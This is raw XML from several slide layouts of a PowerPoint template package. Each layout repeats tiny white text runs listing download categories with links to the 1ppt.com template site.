              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout90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90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90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90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9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91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91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91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91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91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91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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout91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91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91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91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9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92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92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92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92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92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92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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout92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92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92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92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9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93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93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93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93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93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93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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
